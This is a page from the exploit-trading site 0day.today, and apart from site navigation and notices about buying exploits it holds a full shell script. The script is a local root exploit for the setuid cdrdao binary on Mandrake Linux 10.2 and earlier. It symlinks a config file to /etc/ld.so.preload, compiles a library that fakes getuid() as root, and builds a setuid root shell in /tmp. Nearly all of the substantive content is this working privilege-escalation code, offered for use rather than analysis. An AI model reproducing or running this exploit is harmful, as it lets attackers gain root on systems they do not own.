0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux Mandrake <= 10.2 cdrdao Local Root Exploit (unfixed)
========================================================== Linux Mandrake <= 10.2 cdrdao Local Root Exploit (unfixed) ========================================================== #!/bin/sh # cdrdao local root exploit # newbug [at] chroot.org # IRC: irc.chroot.org #chroot # May 2005 echo "cdrdao private exploit" echo "This exploit only for Mandrake series" echo "newbug [at] chroot.org" echo "May 2005" echo "checking if cdrdao is setuid ..."; if [ ! -u /usr/bin/cdrdao ]; then echo "[-] Failed"; exit fi echo "[+] done."; echo "checking if /etc/ld.so.preload already exist ..." if [ -f /etc/ld.so.preload ]; then echo "[-] Failed." exit else echo "[+] done." fi echo "checking if ~/.cdrdao already exist ..." if [ -f ~/.cdrdao ]; then rm -rf ~/.cdrdao fi echo "[+] done." cd /tmp echo "preparing hook library ..." cat >ld.so.c<<EOF #include <stdlib.h> uid_t getuid() { return 0; } EOF echo "[+] done." echo "preparing shell program ..." cat >sh.c <<EOF #include <stdio.h> #include <unistd.h> int main(int argc,char **argv) { setreuid(0,0); setgid(0); unlink("/tmp/ld.so"); if(getuid()) { printf("[-] Failed.\n"); unlink(argv[0]); exit(0); } printf("[+] Congratulation, You win the game !!\n"); unlink("/etc/ld.so.preload"); execl("/bin/bash","bash",(char *)0); return 0; } EOF echo "[+] done." echo "link .cdrdao ==> /etc/ld.so.preload ..." ln -sf /etc/ld.so.preload ~/.cdrdao echo "[+] done." echo "compile hook library ..." gcc -shared -o ld.so ld.so.c echo "[+] done." echo "compile shell program ..." gcc -o sh sh.c echo "[+] done." umask 0 echo "run cdrdao ..." cdrdao unlock --save >/dev/null 2>&1 echo "[+] done." echo "checking if /etc/ld.so.preload created successful..." if [ -f /etc/ld.so.preload ]; then echo "[+] done." else echo "[-] Failed." exit fi echo "/tmp/ld.so">/etc/ld.so.preload rm -f /tmp/sh.c rm -f /tmp/ld.so.c su -c "chown root.root /tmp/sh;chmod 4755 /tmp/sh" >/dev/null 2>&1 echo "!@#\$@%#$%#$%!@%^" /tmp/sh # 0day.today [2024-07-07] #